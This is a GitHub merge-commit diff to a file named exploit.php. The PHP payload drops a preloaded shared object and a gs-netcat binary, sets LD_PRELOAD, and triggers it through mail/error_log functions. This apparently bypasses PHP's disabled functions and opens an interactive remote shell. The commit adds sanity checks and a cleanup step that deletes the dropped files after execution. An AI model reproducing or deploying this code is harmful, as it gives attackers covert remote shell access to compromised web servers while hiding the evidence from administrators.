Merge pull request #2 from Cvar1984/dev

Dev
Cvar1984 · Aug 9, 2024 · 8dedb48 · 8dedb48
2 parents fc04d79 + b1dd024
commit 8dedb48
Showing 1 changed file with 19 additions and 1 deletion.
diff --git a/exploit.php b/exploit.php
@@ -29,7 +29,7 @@ function unpack_object($object)
 echo 'gs-netcat -is ' . $secret_key;
 
 $absolute_path = realpath(getcwd());
-$gs_args = sprintf('-k %s/.env -il', $absolute_path);
+$gs_args = sprintf('-k %s/.env-gs -il', $absolute_path);
 file_put_contents($absolute_path . '/.env', $secret_key);
 chmod($absolute_path . '/.env', 0600);
 
@@ -40,6 +40,17 @@ function unpack_object($object)
 file_put_contents('x64_nc', $gs_ncat_bin_x64);
 chmod('x64_nc', 0755);
 
+// check object
+if (filesize($absolute_path . '/x64.so') == 0) {
+	die('Unable to put shared object please compile and place it manually');
+}
+if (filesize($absolute_path . '/x64_nc') == 0) {
+	die('Unable to put elf please compile and place it manually');
+}
+if (filesize($absolute_path . '/.env-gs') == 0) {
+	die('Unable to put environment please do it manually');
+}
+
 // set environment variables
 putenv(sprintf('PRELOAD=%s', $absolute_path . '/x64_nc'));
 putenv(sprintf('LD_PRELOAD=%s', $absolute_path . '/x64.so'));
@@ -57,3 +68,10 @@ function unpack_object($object)
 } elseif(function_exists('error_log')) {
 	@error_log('a',1,'a');
 }
+
+// cleanup
+sleep(3);
+
+unlink($absolute_path . '/x64.so');
+unlink($absolute_path . '/x64_nc');
+unlink($absolute_path . '/.env-gs');